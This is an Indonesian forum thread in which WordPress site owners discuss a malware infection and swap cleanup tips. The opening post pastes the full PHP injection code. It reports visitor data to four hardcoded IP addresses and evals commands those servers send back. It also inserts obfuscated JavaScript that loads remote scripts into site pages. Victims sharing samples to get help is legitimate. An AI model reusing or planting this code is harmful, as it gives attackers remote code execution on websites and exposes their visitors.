Its this script again :/
if (!function_exists(GetMama)){function opanki($buf){$god_mode = $_SERVER["good"]; str_replace("href","href",strtolower($buf),$cnt_h); str_replace("<?xml","<?xml",strtolower($buf),$cnt_x); if (($cnt_h > 2)&&($cnt_x == 0)) {$buf = $god_mode . $buf;} return $buf; } function GetMama(){$mother = "www.pocitac.com";return $mother;}ob_start("opanki");$show = false;function ahfudflfzdhfhs($pa){global $show; global $god_mode; $mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));}$url = "http://" . $pa . "/opp.php?mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua;if( function_exists("curl_init") ){$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = curl_exec($ch);} else {$ult = @file_get_contents($url);} if (strpos($ult,"eval") !== false){$z = str_replace("eval","",$ult); eval($z); $show = true; return true;} if (strpos($ult,"ebna") !== false){$z = str_replace("ebna","",$ult); $god_mode = $z; $show = true; return true; $_SERVER["good"] = $god_mode; } else {return false;}}$father[] = "146.185.254.245";$father[] = "31.184.242.103";$father[] = "91.196.216.148";$father[] = "91.196.216.49";foreach($father as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}if ($show === false){$script='<script>var _0x8ab7=["\x31\x34\x36\x2E\x31\x38\x35\x2E\x32\x35\x34\x2E\x32\x34\x35","\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x33","\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x31\x34\x38","\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x34\x39","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F","\x2F\x73\x2E\x70\x68\x70","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];var _0xa341=[_0x8ab7[0],_0x8ab7[1],_0x8ab7[2],_0x8ab7[3]];for(var i in _0xa341){var js=document[_0x8ab7[5]](_0x8ab7[4]);js[_0x8ab7[6]]=_0x8ab7[7]+_0xa341[i]+_0x8ab7[8];var head=document[_0x8ab7[10]](_0x8ab7[9])[0];head[_0x8ab7[11]](js);} ;</script>'; $god_mode = $script;} $_SERVER["good"] = $god_mode; }
Coba di restore dulu aja sob make backup-an sebelum kena ini malware
baru beres recover ane gan,,
itu si eval base 64 biasanya ada di function.php (atau sejenisnya) jadi itu diembed di file function buat di load di header,,
lalu buka wp-content di situ ada 2 file php aneh,, selain index.php
hapus 22nya
lalu di wp-config.php
file agan akan ada 4000baris,, hapus setelah wp setting ke bawah,,
semoga membantu
lalu hardening server anda 😀
yans
Apakah musti di restore terlebih dahulu?
Saya sudah coba hapus scriptnya di file config.php, tapi tetap tidak bisa.
ada solusi lain??
Saya memeliki beberapa amazon mini site yang terserang malware. Salah satunya adalah : http://nikoncoolpixs930016mp.com. sangkin parahnya mbah google selalu memperingatkan jika mengunjungi URL tersebut. Mereka di blok oleh google sehingga wp-adminnya pun tidak bisa di buka. Satus atunya yang masih bisa saya buka hanya idrusBlog.com Masih adakah cara memperbaiki mini site tersebut.
Mohon supportnya dan bantuannya teman-teman.
Terima kasih
Idrus.
